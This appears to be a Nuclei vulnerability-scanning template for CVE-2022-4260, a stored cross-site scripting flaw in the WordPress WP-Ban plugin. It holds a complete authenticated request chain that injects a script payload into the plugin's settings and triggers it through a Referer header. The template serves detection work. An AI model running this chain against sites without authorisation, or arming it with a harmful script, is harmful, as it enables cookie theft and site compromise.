71 lines
2.4 KiB
YAML
71 lines
2.4 KiB
YAML
id: CVE-2022-4260
|
|
|
|
info:
|
|
name: WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting
|
|
author: Hardik-Solanki
|
|
severity: medium
|
|
description: |
|
|
WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
|
|
- https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
|
|
remediation: Fixed in version 1.69.1
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 4.8
|
|
cve-id: CVE-2022-4260
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: "true"
|
|
tags: wp-plugin,xss,wp-ban,authenticated,wpscan,cve,cve2022,wordpress,wp
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
|
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
|
|
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Referer: XSS
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
cookie-reuse: true
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_4, "<script>alert(document.domain);</script>")'
|
|
- 'contains(content_type_4, "text/html")'
|
|
- 'status_code_4 == 200'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: nonce
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '_wpnonce=([0-9a-z]+)'
|
|
internal: true
|
|
|
|
# Enhanced by md on 2023/01/06
|